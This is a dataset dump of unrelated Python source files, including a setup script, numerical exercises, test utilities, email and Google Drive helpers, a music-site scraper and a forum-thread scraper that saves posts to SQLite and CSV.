sys.version_info < (3, 3):\n install_requires.append('backports.shutil_get_terminal_size')\nif sys.version_info < (3, 4):\n install_requires.extend(['enum34', 'pathlib'])\n\n\ndef readme():\n with open('README.rst') as f:\n content = f.read()\n return content\n\n\ndef get_version():\n version_file = 'mmcv/version.py'\n with open(version_file, 'r') as f:\n exec(compile(f.read(), version_file, 'exec'))\n return locals()['__version__']\n\n\nsetup(\n name='mmcv',\n version=get_version(),\n description='Open MMLab Computer Vision Foundation',\n long_description=readme(),\n keywords='computer vision',\n packages=find_packages(),\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Utilities',\n ],\n url='https://github.com/open-mmlab/mmcv',\n author='Kai Chen',\n author_email='chenkaidev@gmail.com',\n license='GPLv3',\n setup_requires=['pytest-runner'],\n tests_require=['pytest'],\n install_requires=install_requires,\n zip_safe=False)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"392878281","text":"#-*-coding:utf-8-*-\nimport mymath\n\n#求从 1~N 中选取 7 个合数时,最多经过 6 层就可以与其他所有数产生联系的最小的 N 。 \n\n#分析:数字都可以由质数的乘机来表示,所以推出公约数中必有质数进而推出最短得到N的方法为质数乘机递推,a*b,b*c,c*d...\n#若第一步为a*a不影响后续单一对应,故第一个数可以为平方数,同理可得最后以为也可以为平方数,其中a,b,c...均为质数\n#下一步求出乘法式子中最下的等式--->对质数排序然后两两相乘求出最大值进行比较\n\n#代码\n\ndef ReN(N):\n pirmlist=mymath.RePrim(N)\n pirmlist.pop(0)\n pirmlist=mymath.SubPerm(pirmlist,N-1)\n max = 9999\n tmplist = []\n for i in pirmlist:\n mulitilst = mymath.CircleNMultiList(i,2)\n mulitilst.pop()\n mulitilst.append(i[0]*i[0])\n mulitilst.append(i[-1]*i[-1])\n tmp=mymath.ListMax(mulitilst)\n if tmp < max:\n max = tmp\n tmplist = i\n return [max,tmplist]\n\nif __name__==\"__main__\":\n print(ReN(7))\n","sub_path":"Code/Q19--朋友的朋友也是朋友吗.py","file_name":"Q19--朋友的朋友也是朋友吗.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"142213382","text":"# ... ENTER YOUR CODE HERE ...\nimport numpy as np\n\ndef lu_perm(a):\n \"\"\"Construct the LU decomposition of the input matrix.\n \n with permutation.\n \"\"\"\n N = a.shape[0]\n \n u = a.copy()\n L = np.eye(N)\n P = np.eye(N)\n for j in range(N-1):\n lam = np.eye(N)\n \n vector = u[j:,j]\n #print(j)\n #print(vector)\n maxidx=np.argmax(np.absolute(vector))\n #print(maxidx)\n #print(u)\n u[[j,maxidx+j],:]=u[[maxidx+j,j],:]\n L[:,[j,maxidx+j]]=L[:,[maxidx+j,j]]\n P[[j,maxidx+j],:]=P[[maxidx+j,j],:]\n \n gamma = u[j+1:, j] / u[j, j]\n \n lam[j+1:, j] = -gamma\n u = lam @ u\n\n lam[j+1:, j] = gamma\n L = L @ lam\n return P, L, u\n\ndef lu_perm_res(a):\n P,L,U=lu_perm(a)\n print(P)\n print(L)\n print(U)\n print( L@U )\n print(a)\n print(L@U - a)\n\nprint(lu_perm_res(a))\nprint(lu_perm_res(a1))\n\n","sub_path":"week1_LU_perm.py","file_name":"week1_LU_perm.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"559455604","text":"import datetime\nfrom typing import List, Set, Type\n\nfrom diagnosers.abstract_diagnoser import AbstractDiagnoser\nfrom experimentation.metrics.abstract_metric import AbstractMetric\nfrom experimentation.metrics.single_diagnosis_results import SingleDiagnoserResults\nfrom experimentation.sub_experiment.sub_experiment_results import SubExperimentResults\nfrom models.diagnosis.dx_problem_instances.base_dx_problem_instance import BaseDxProblemInstance\nfrom models.test_suite_models.logic_method import LogicMethod\n\n\nclass SubExperiment:\n \"\"\"\n a subexperiment runs an instance against multiple diagnosers, and compares results\n \"\"\"\n\n def __init__(self, index: int, instance: BaseDxProblemInstance, diagnosers: List[AbstractDiagnoser],\n ground_truth: Set[LogicMethod], metrics: List[AbstractMetric]):\n self.index = index\n self.instance = instance\n self.diagnosers = diagnosers\n self.ground_truth = ground_truth\n self.metrics = metrics\n\n def run(self) -> SubExperimentResults:\n results = []\n for diagnoser in self.diagnosers:\n start_time = datetime.datetime.now()\n diag_solution = diagnoser.try_to_diagnose(self.instance)\n end_time = datetime.datetime.now()\n dx_time = end_time - start_time\n dx_time_ms = dx_time.total_seconds() * 1000\n single_diag_results = SingleDiagnoserResults(sub_experiment_index=self.index,\n diagnoser=diagnoser, diagnoser_solution=diag_solution,\n dx_time_ms=dx_time_ms,\n ground_truth=self.ground_truth, metrics=self.metrics)\n results.append(single_diag_results)\n return SubExperimentResults(sub_experiment_index=self.index, instance=self.instance, results=results)\n\n def __repr__(self):\n return f''\n","sub_path":"experimentation/sub_experiment/sub_experiment.py","file_name":"sub_experiment.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"623062067","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\n\n# In[4]:\n\n\nengine = create_engine(r\"sqlite:///C:\\Users\\\\Brian\\salesdata.db\")\nsql = \"select name from sqlite_master\"\n\"where type = 'table';\"\nsales_data_df = pd.read_sql(sql, engine)\nsales_data_df\n\n\n# In[5]:\n\n\nsql_table = \"select * from scores\"\nscore_data_df = pd.read_sql(sql_table, engine)\nscore_data_df.head()\n\n","sub_path":"Assignment 7.2.2.py","file_name":"Assignment 7.2.2.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"314294883","text":"from copy import deepcopy\nfrom openpyxl import load_workbook\nimport os\n\nfrom common.log import logger\nfrom common.error import NotFoundCaseId, FileContentError, ConfKeyNotFound, FileNotFoundError2\nfrom common.parseyaml import config\n\n\nlogger = logger()\n\n\nclass XLSX:\n\n def __init__(self, name=None):\n # Handle data file absolute name\n if name:\n # If provided file name\n self.name = name\n else:\n try:\n # Read data file from config\n self.name = config.get_conf(\"file\").get(\"case_file\")\n except ConfKeyNotFound:\n # Use default file path\n self.name = os.path.abspath(\"./data/cmdb_data.xlsx\")\n if not os.path.exists(self.name):\n message = \"Data file not exist!\"\n raise FileNotFoundError2(message)\n # Read contents from data file\n self.workbook = load_workbook(filename=self.name)\n self.sheets = self.workbook.sheetnames\n # Only use the 1st sheet.\n if len(self.sheets) > 1:\n logger.warn(\"The excel file have more than one sheet, now we use the first sheet.\")\n\n self.content = self.workbook[self.sheets[0]]\n self.case_content = {}\n self.ids_content = {}\n\n def _case_content(self):\n # Get all rows by generator\n rows = self.content.rows\n # Get names of every column\n head_row = next(rows)\n heads = [x.value for x in head_row]\n # Store every case content to content_list\n content_list = []\n # Add every case content to content_list\n for case in rows:\n case_dict = {}\n current_case = [x.value for x in case]\n # Set value to every column's name as dict\n for head, value in zip(heads, current_case):\n case_dict[head] = value\n content_list.append(case_dict)\n return content_list\n\n def get_data_by_id(self, id_: (str, int)) -> dict:\n \"\"\"\n You can get data by id of every case\n :param id_:\n :return: dict\n {\n \"1\": {\n 'id': 1,\n 'section': '初始化',\n 'case_id': 16761,\n 'case_name': '清空数据'\n ...\n }\n }\n \"\"\"\n id_ = str(id_)\n # If ids_content is not empty, it already contains all cases\n if self.ids_content:\n return self.ids_content.get(id_)\n\n # Add all case to ids_content\n field_name = \"id\"\n case_content = self._case_content()\n for content in case_content:\n id_name = content.get(field_name, -1)\n self.ids_content[str(id_name)] = content\n return self.ids_content.get(id_)\n\n def get_data_by_case_id(self, column_key: (str, int), column=\"case_id\") -> list:\n \"\"\"\n Get a group data by case_id\n :param column: The column's name used to sort data\n :param column_key: get the column_key of data\n :return: list like below\n [\n {\n 'id': 10,\n 'section': '上传训练',\n 'case_id': 2862\n },\n {\n 'id': 11,\n 'section': '上传训练',\n 'case_id': 2862\n },\n {\n 'id': 12,\n 'section': '上传训练',\n 'case_id': 2862\n }\n ]\n \"\"\"\n column_key = str(column_key)\n if self.case_content:\n return self.case_content.get(column_key)\n case_content: list = self._case_content()\n for content in case_content:\n id_name = content.get(column, -1)\n case_id_str = str(id_name)\n # If self.case_content already has case_id_str, append case to it, otherwise, set to list first\n if case_id_str not in self.case_content:\n self.case_content[case_id_str] = []\n self.case_content[case_id_str].append(content)\n return self.case_content.get(column_key)\n\n\nif __name__ == \"__main__\":\n # file_name = \"/Users/eoitek/PycharmProjects/Alert2.3/data/alert2.3_test_data.xlsx\"\n xlsx = XLSX(None)\n data = xlsx.get_data_by_case_id(17777)[2]\n","sub_path":"common/xlsx.py","file_name":"xlsx.py","file_ext":"py","file_size_in_byte":4227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"395072239","text":"import pysnooper\n\n@pysnooper.snoop()\ndef permute(nums):\n res = []\n def backtrack(tem,num):\n if not num:\n res.append(tem)\n\n for i in range(len(num)):\n backtrack(tem+[num[i]],num[:i]+num[i+1:])\n backtrack([],nums)\n return res\n\nif __name__ == \"__main__\":\n nums = [1,2,3]\n permute(nums)\n","sub_path":"Python/46-全排列.py","file_name":"46-全排列.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"94306933","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#2007-06-25\n# Copyright 2007 Michael Towers\n\n# This file is part of Zeugs.\n#\n# Zeugs is free software; you can redistribute it and/or modify it under\n# the terms of the GNU General Public License as published by the Free\n# Software Foundation; either version 2 of the License, or (at your\n# option) any later version.\n#\n# Zeugs is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n# See the GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Zeugs; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n#\n\"\"\"A simple dialog to fetch the password for connecting to the\nmaster (PostgreSQL) database.\n\"\"\"\n# pyuic4 command:\n# pyuic4 -o ui_dlg_getPw.py dlg_getPw.ui\n\n# To convert the i18n stuff to gettext form, use gettextify, e.g.\n# gettextify ui_dlg_getPw.py\n\nfrom PyQt4 import QtCore, QtGui\n\nimport ui_dlg_getPw as ui_dlg\n\ndef getPw(host, name, user):\n Dialog = QtGui.QDialog()\n ui = ui_dlg.Ui_Dialog()\n ui.setupUi(Dialog)\n\n ui.lineEdit_host.setText(host)\n ui.lineEdit_name.setText(name)\n ui.lineEdit_user.setText(user)\n\n ui.lineEdit_pw.setFocus()\n if not Dialog.exec_():\n return None\n\n return unicode(ui.lineEdit_pw.text())\n","sub_path":"tags/zeugs-source-2.2.10/zgsync/getPw.py","file_name":"getPw.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"120657384","text":"import re\nimport time\nfrom poplib import POP3\n\nfrom EmailLibrary.base import LibraryComponent, keyword\n\n\nclass ReceiveKeywords(LibraryComponent):\n time_out = 300\n\n def __init__(self, ctx):\n LibraryComponent.__init__(self, ctx)\n\n @keyword\n def listen_to_mail_account(self, account_id=None):\n account = self.account(account_id)\n\n pop_client = POP3(account.pop3_host, account.pop3_port)\n pop_client.user(account.login_name)\n pop_client.pass_(account.login_pass)\n\n stat = pop_client.stat()\n pop_client.quit()\n account.set_pop_listener(stat)\n\n @keyword\n def exist_new_mail_with_subject(self, subject, account_id=None):\n def check_func(content):\n return len(re.findall(subject, content)) > 0\n mail_index = self.exist_new_mail_with_header(account_id, check_func)\n self.info('Find mail at index {}.'.format(mail_index))\n\n @keyword\n def exist_new_mail_with_message_id(self, message_id, account_id=None):\n def check_func(content):\n return len(re.findall(message_id, content)) > 0\n mail_index = self.exist_new_mail_with_header(account_id, check_func)\n self.info('Find mail at index {}.'.format(mail_index))\n\n def exist_new_mail_with_header(self, account_id, check_func):\n account = self.account(account_id)\n listen_start = account.pop3_listener\n time_start = time.time()\n time_end = time_start + self.time_out\n\n pop_client = POP3(account.pop3_host, account.pop3_port)\n pop_client.user(account.login_name)\n pop_client.pass_(account.login_pass)\n\n while True:\n if time.time() > time_end:\n break\n\n listen_end = pop_client.stat()[0]\n for i in range(listen_start, listen_end + 1):\n headers = pop_client.top(i, 0)[1]\n for header in headers:\n if check_func(header):\n return i\n listen_start = listen_end\n\n raise AssertionError('No corresponding mail received.')\n","sub_path":"src/EmailLibrary/keywords/receive.py","file_name":"receive.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"26429767","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/travis/build/universalcore/unicore.distribute/unicore/distribute/tasks.py\n# Compiled at: 2016-05-07 05:25:40\nfrom pyramid_celery import celery_app as app\nfrom elasticgit import EG\nfrom unicore.content.models import Page, Category, Localisation\n\n@app.task(ignore_result=True)\ndef fastforward(repo_path, index_prefix, es={}):\n workspace = EG.workspace(repo_path, index_prefix=index_prefix, es=es)\n workspace.fast_forward()\n workspace.reindex(Page)\n workspace.reindex(Category)\n workspace.reindex(Localisation)","sub_path":"pycfiles/unicore.distribute-1.1.2.tar/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"48200212","text":"from googleapiclient.http import MediaFileUpload\nfrom delete import service\ndef CheckFileDir(FileName):\n # page_token = None\n results = service.files().list(q='trashed=false',spaces='drive',fields=\"nextPageToken, files(id, name)\",pageSize=400).execute()\n items = results.get('files', [])\n\n # print(len(items))\n # for i in items: \n if not items:\n print('No files found.')\n return None\n else:\n # print('Files:')\n for item in items:\n # print(item['name'])\n if(item['name'] == FileName):\n print(FileName + \" is already there\")\n # print(item['name'])\n return item['id']\n \ndef delete_file(filename):\n\n file_id = CheckFileDir(filename)\n print(file_id)\n try:\n service.files().delete(fileId=file_id).execute()\n print(\"success : successfully deleted the file\")\n except Exception as e:\n print('An error occurred: %s',e)\ndef UploadFile(path,local_filename,upload_name):\n file = CheckFileDir(upload_name)\n # print(file)\n if(file != None):\n ask = input(\"Wanna replace ? delete old one? Y/N: \")\n if(ask.lower() == 'y' ):\n delete_file(upload_name)\n \n file_metadata = {\n 'name': upload_name,\n 'mimeType': 'application/vnd.google-apps.spreadsheet'\n }\n media = MediaFileUpload(path+local_filename,\n mimetype='application/vnd. openxmlformats-officedocument',\n resumable=True)\n file = service.files().create(body=file_metadata,\n media_body=media,\n fields='id').execute()\n print('File ID: %s' % file.get('id'))\n \n\nif __name__ == '__main__':\n path = 'I:\\\\clients\\\\jgil1000\\\\'\n drive_filename = \"newFile\"\n filename = \"agency.xlsx\"\n UploadFile(path,filename,drive_filename)\n","sub_path":"clients/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"653036976","text":"from urllib import request\r\n\r\nfrom bs4 import BeautifulSoup\r\n\r\nfrom cz.api.category import Category\r\n\r\n# url = 'http://www.kuwo.cn/www/category/index/'\r\n# headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}\r\n# cookie = cookiejar.CookieJar()\r\n# handler = request.HTTPCookieProcessor(cookie)\r\n# opener = request.build_opener(handler,request.HTTPHandler(debuglevel=1))\r\n# request.install_opener(opener)\r\n\r\nheaders = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}\r\n\r\n#获取类别(Python对象)\r\ndef fetch_categories():\r\n url = 'http://www.kuwo.cn/www/category/index/'\r\n req = request.Request(url, data=None, headers=headers)\r\n html = request.urlopen(req).read()\r\n soup = BeautifulSoup(html,'html5lib')\r\n\r\n cates = []\r\n for bang in soup.find_all('div',{'class':'bang'}):\r\n #print('大类',bang.h2['data-catid'],bang.h2.get_text())\r\n cate = Category(bang.h2['data-catid'],bang.h2.get_text())\r\n children_cates = []\r\n for a in bang.find('li').find_all('a'):\r\n #print(a.attrs['data-catid'],a.get_text())\r\n child = Category(a.attrs['data-catid'], a.get_text())\r\n children_cates.append(child)\r\n cate.children = children_cates\r\n cates.append(cate)\r\n\r\n return cates\r\n\r\n#获取类别(json对象)\r\ndef fetch_json_categories():\r\n url = 'http://www.kuwo.cn/www/category/index/'\r\n req = request.Request(url, data=None, headers=headers)\r\n html = request.urlopen(req).read()\r\n soup = BeautifulSoup(html,'html5lib',from_encoding='uft-8')\r\n\r\n cates = list()\r\n for bang in soup.find_all('div',{'class':'bang'}):\r\n big_cate = dict()\r\n big_cate['id'] = bang.h2['data-catid']\r\n big_cate['name'] = bang.h2.get_text()\r\n children_cates = list()\r\n for a in bang.find('li').find_all('a'):\r\n child_cate = dict()\r\n child_cate['id'] = a.attrs['data-catid']\r\n child_cate['name'] = a.get_text()\r\n children_cates.append(child_cate)\r\n big_cate['children'] = children_cates\r\n cates.append(big_cate)\r\n return cates\r\n #return json.dumps(cates,ensure_ascii=False)\r\n\r\n\r\n# cats = fetch_json_categories()\r\n# print(cats)\r\n\r\n#获取歌词\r\ndef fetch_music_lyric(mid):\r\n url = 'http://www.kuwo.cn/yinyue/{}'.format(mid)\r\n req = request.Request(url, data=None, headers=headers)\r\n html = request.urlopen(req).read()\r\n soup = BeautifulSoup(html, 'html5lib', from_encoding='uft-8')\r\n lyric = list()\r\n for p in soup.find_all('p',{'class':'lrcItem'}):\r\n lyric.append(p.get_text())\r\n return lyric\r\n\r\n#获取歌曲详细信息(名称,链接,歌手,音乐id)\r\ndef fetch_music_detail(catId=88096, pageno=0, pagesize=50):\r\n url = 'http://www.kuwo.cn/www/category/content/music?catId={0}&pn={1}&rn={2}'.format(catId, pageno, pagesize)\r\n req = request.Request(url, data=None, headers=headers)\r\n html = request.urlopen(req).read()\r\n soup = BeautifulSoup(html, 'html5lib', from_encoding='uft-8')\r\n musics = []\r\n for li in soup.find_all('li'):\r\n name = li.find('div',{'class':'name'}).find('a').get_text()\r\n href = li.find('div',{'class':'name'}).find('a').attrs['href']\r\n artist = li.find('div',{'class':'artist'}).find('a').get_text()\r\n music_id = href.replace('http://www.kuwo.cn/yinyue/','')\r\n #lyric = fetch_music_lyric(href)\r\n path = 'http://antiserver.kuwo.cn/anti.s?rid=MUSIC%5F{0}&format={1}&response=url&type=convert%5Furl'.format(music_id,'mp3')\r\n music = {}\r\n music['name'] = name\r\n music['href'] = href\r\n music['artist'] = artist\r\n music['id']= music_id\r\n #music['lyric'] = lyric\r\n music['path'] = path\r\n musics.append(music)\r\n return musics\r\n #return json.dumps(musics,ensure_ascii=False)\r\n\r\n# res = fetch_music_detail()\r\n# print(res)\r\n\r\n# res = fetch_music_lyric('507539')\r\n# print(res)\r\n\r\n\r\n","sub_path":"music_spider.py","file_name":"music_spider.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"497266032","text":"# coding: utf-8\n# Store the image URL together with the score commit to the SQL database\n# Change state to end editing session\n# Created by James Raphael Tiovalen (2020)\n\nimport slack\nimport settings\nimport json\nimport config\nimport requests\n\nfrom slackers.hooks import events, actions\n\nconv_db = config.conv_handler\n\n\n# This will run if there are no remarks submitted\n# Remarks will be handled by the judging side\n@actions.on(\"block_actions:editing_end\")\ndef finalize_judging(payload):\n channel = payload[\"channel\"][\"id\"]\n user_id = payload[\"user\"][\"id\"]\n state = conv_db.get_state(channel, user_id)\n\n if state != config.EDIT_REMARKS:\n config.web_client.chat_postMessage(\n channel=channel,\n text=f\"You can only execute this command after submitting scores as a judge, <@{user_id}>!\",\n )\n\n else:\n latest_message_ts = conv_db.get_ts(channel, user_id)\n message = f\"Your judging process has been finalized, <@{user_id}>!\"\n config.web_client.chat_update(\n channel=channel, text=message, ts=latest_message_ts, blocks=None\n )\n\n conv_db.change_state(channel, user_id, config.CONVERSATION_END)\n\n return\n","sub_path":"app/handlers/editing/end_edit.py","file_name":"end_edit.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"317616922","text":"# -*- coding: gbk-*-\n\n\"\"\"\nanalyse changes of Q values, and the max Q's action\n\"\"\"\nimport os\nimport pickle as pkl\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ntemp_dir = {}\ndir_path = \"/home/cike/chauncy/coding/spyder/multiagent/soccerdata/actionvisit_20180507\"\n\n\ndir_files = os.listdir(dir_path)\nfor i in dir_files:\n if \"AGENT_1\" in i and \"action\" in i:\n file_path = os.path.join(dir_path, i)\n temp_dir = pkl.load(open(file_path, \"rb\"), encoding='iso-8859-1')\n\n\n\nall_kyes = []\nlen_keys = []\nzero_len_keys = []\nfor keys in temp_dir:\n values = np.array(temp_dir[keys], dtype=np.float32).T[:-1]\n values_len = len(values[values==np.float(0)]) \n \n all_kyes.append(keys)\n zero_len_keys.append(values_len)\n len_keys.append(len(temp_dir[keys]))\n\n \nall_kyes = np.array(all_kyes)\nlen_keys = np.array(len_keys)\nzero_len_keys = np.array(zero_len_keys)\n\n\nmax_keys_list = all_kyes[len_keys>2000]\nzero_len_keys_list = zero_len_keys[len_keys>2000]\n\n\nmax_keys = tuple(list(max_keys_list[np.argmin(zero_len_keys_list)]))\nmax_len_keys_values = np.array(temp_dir[max_keys]).T[:-1]\nlabel_index = np.array(temp_dir[max_keys]).T[-1]\n\n\n# max_len = 30000\nusableActions = [\"SHOOT\", \"DRIBBLE\", \"PASSfar\", \"PASSnear\", \"MOVE\"]\ndiffQ = []\nmaxQ = []\nfor index, i in enumerate(max_len_keys_values[:-1].T):\n diffQ.append(abs(max(i) - min(i)))\n maxQ.append(max(i))\n \n \nplt.figure()\nplt.plot(range(len(diffQ)), diffQ, label=\"diffQ\")\nplt.legend(loc='best')\nplt.show()\n\n\nplt.figure()\nplt.plot(range(len(maxQ)), maxQ, label=\"maxQ\")\nplt.legend(loc='best')\nplt.show()\n\n\ndiffQ = np.array(diffQ)\nmaxQ = np.array(maxQ)\n\nplt.figure()\nplt.plot(range(len(maxQ)), maxQ/(maxQ + 2), label=\"maxQ/ (maxQ/maxQ +2 )\")\nplt.legend(loc='best')\nplt.show()\n \n\nplt.figure()\nfor index, i in enumerate(max_len_keys_values[:-1]):\n plt.plot(range(len(i)), i, label=usableActions[index])\n\nplt.legend(loc='best')\nplt.show()\n \n\n\nplt.figure()\nplt.plot(range(len(max_len_keys_values[-1])), max_len_keys_values[-1], label=usableActions[index])\nplt.legend(loc='best')\nplt.show()\n\n\n\n# maxQ - minQ\ndiffQ_list = []\ndiffQ_max_list = []\nfor key,value in temp_dir.items():\n value_array = np.array(value).T[:-1]\n diffQ = value_array.max(axis=0) - value_array.min(axis=0)\n diffQ_list.append(diffQ)\n diffQ_max_list.append(diffQ.max())\n \ndiffQ_max_list = np.array(diffQ_max_list)\nlen(diffQ_max_list[diffQ_max_list > 0.9])\n\n\ndef ask(visit):\n return np.power(1+0.5, -1*np.sqrt(visit))\n\ndef giveOne(visit):\n return 1 - np.power(1+1.5, -1*np.log2(visit))\n\ndef giveTwo(visit, diffQ):\n return 1 - np.power(1+1.5, -1*np.sqrt(visit)*diffQ)\n\ndef giveTwoOne(x):\n return 1 - np.power(1+0.05, -1*x)\n \ndef giveTHree(x):\n return x/(x+1)\n \n# different visit\nvisit = 1000\nplt.figure()\nplt.plot(range(visit), ask(range(visit)), label=\"ask\")\nplt.plot(range(visit), giveOne(range(visit)), label=\"giveOne\")\nplt.plot(range(visit), giveTwo(range(visit), 0.5), label=\"giveTwo-diffQ 0.5\")\nplt.plot(range(visit), giveTwo(range(visit), 0.1), label=\"giveTwo-diffQ 0.1\")\nplt.legend(loc='best')\nplt.show() \n\n\n# different diffQ\ndiffQ = 1\nplt.figure()\nplt.plot(np.arange(0, diffQ, 0.001), giveTwo(10, np.arange(0, diffQ, 0.001)), label=\"giveTwo-visit 10\")\nplt.plot(np.arange(0, diffQ, 0.001), giveTwo(50, np.arange(0, diffQ, 0.001)), label=\"giveTwo-visit 50\")\nplt.plot(np.arange(0, diffQ, 0.001), giveTwo(100, np.arange(0, diffQ, 0.001)), label=\"giveTwo-visit 100\")\nplt.plot(np.arange(0, diffQ, 0.001), giveTwo(1000, np.arange(0, diffQ, 0.001)), label=\"giveTwo-visit 100\")\nplt.legend(loc='best')\nplt.show() \n \n\n# diffferent Q and visit\nend = 100\nplt.figure()\nplt.plot(np.arange(0, end, 1), giveTwoOne(np.arange(0, end, 1)), label=\"giveTwoOne\")\nplt.show() \n\n \n# diffferent x/(x+1)\nend = 1\nplt.figure()\nplt.plot(np.arange(0, end, 0.01), giveTHree(np.arange(0, end, 0.01)), label=\"giveTHree\")\nplt.show() \n \n \n \n \n \n ","sub_path":"AAMAS2019/soccerdata/analyse_soccer.py","file_name":"analyse_soccer.py","file_ext":"py","file_size_in_byte":3973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"194422778","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nUsage: \npython flashbackscraper.py \nExample url: https://www.flashback.org/t2975477\nWritten by: Christopher Kullenberg \n\"\"\"\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\nimport sqlite3\nimport sys\nimport datetime\nimport csv\n\ncounter = 1\n\ndef parsethread(nexturl):\n print(\"Scraping\", nexturl)\n threadnumber = nexturl[26:]\n postidlist = []\n userlist = []\n datelist = []\n timelist = []\n bodylist = []\n inreplylist = []\n r = requests.get(nexturl)\n print(r)\n html = r.content\n soup = BeautifulSoup(html, \"lxml\")\n #print(soup)\n postbody = soup.findAll(\"div\", class_=\"post_message\")\n username = soup.findAll(\"li\", class_=\"dropdown-header\")\n heading = soup.findAll(\"div\", class_=\"post-heading\")\n print(\"Length: \" + str(len(postbody)))\n for p in postbody:\n postid = re.findall(\"(?<=id\\=\\\"post\\_message\\_).*?(?=\\\"\\>)\", str(p), \n re.IGNORECASE)\n if postid:\n postidlist.append(postid[0])\n for u in username:\n if u.text == \"Ämnesverktyg\":\n continue\n else:\n userlist.append(u.text)\n for h in heading:\n yesterday = datetime.date.today() - datetime.timedelta(1)\n todaymatch = re.findall(\"Idag,\\s\\d\\d\\:\\d\\d\", h.text, re.IGNORECASE)\n yesterdaymatch = re.findall(\"Igår,\\s\\d\\d\\:\\d\\d\", h.text, re.IGNORECASE)\n match = re.findall(\"\\d\\d\\d\\d\\-\\d\\d\\-\\d\\d,\\s\\d\\d\\:\\d\\d\", h.text, \n re.IGNORECASE)\n if todaymatch:\n datelist.append(datetime.date.today())\n #print(datetime.date.today())\n timelist.append(todaymatch[0][6:])\n elif yesterdaymatch:\n datelist.append(yesterday)\n #print(yesterday)\n timelist.append(yesterdaymatch[0][6:])\n elif match:\n datelist.append(match[0][:10])\n print(match[0][:10])\n timelist.append(match[0][12:])\n for p in postbody:\n bodylist.append(p.text)\n for p in postbody:\n match = re.findall(\"(?<=Ursprungligen postat av ).*\", p.text, \n re.IGNORECASE)\n if match:\n inreplylist.append(match[0])\n else:\n inreplylist.append(\"none\")\n\n print(len(postidlist), len(userlist), len(datelist), len(timelist), \n len(bodylist), len(inreplylist))\n #print(soup)\n for n in range(0,12):\n print(\"Adding post\", str(((counter * 12) + n) - 12), \"to database\")\n try:\n cursor.execute('''\n INSERT INTO fb(idnumber, user, date, time, body, inreply)\n VALUES(?,?,?,?,?,?)''', \n (postidlist[n], userlist[n], datelist[n], timelist[n], \n bodylist[n], inreplylist[n])\n )\n db.commit()\n except (IndexError, sqlite3.IntegrityError) as e:\n print(\"\\nEnd of thread\\nWriting sqlite3 and csv files\\nExiting...\")\n outfile = open(nexturl[26:] + \".csv\", \"w\")\n csvWriter = csv.writer(outfile)\n rows = cursor.execute('SELECT * FROM fb')\n csvWriter.writerows(rows)\n outfile.close()\n sys.exit()\n\ndef iterator(starturl):\n nexturl = starturl + \"p\" + str(counter)\n parsethread(nexturl)\n\nif __name__ == '__main__':\n starturl = sys.argv[1]\n try:\n db = sqlite3.connect(starturl[26:] + '.sqlite3')\n cursor = db.cursor()\n cursor.execute('''\n CREATE TABLE fb(id INTEGER PRIMARY KEY, idnumber TEXT UNIQUE, user TEXT,\n date TEXT, time TEXT, body TEXT, inreply TEXT)\n ''')\n db.commit()\n while True:\n iterator(starturl)\n print(\"All done for page:\", str(counter), \"\\n\")\n counter += 1\n except sqlite3.OperationalError:\n print(\"The file\", starturl[26:] + \n \".sqlite3 already exists. Try renaming it first.\")\n 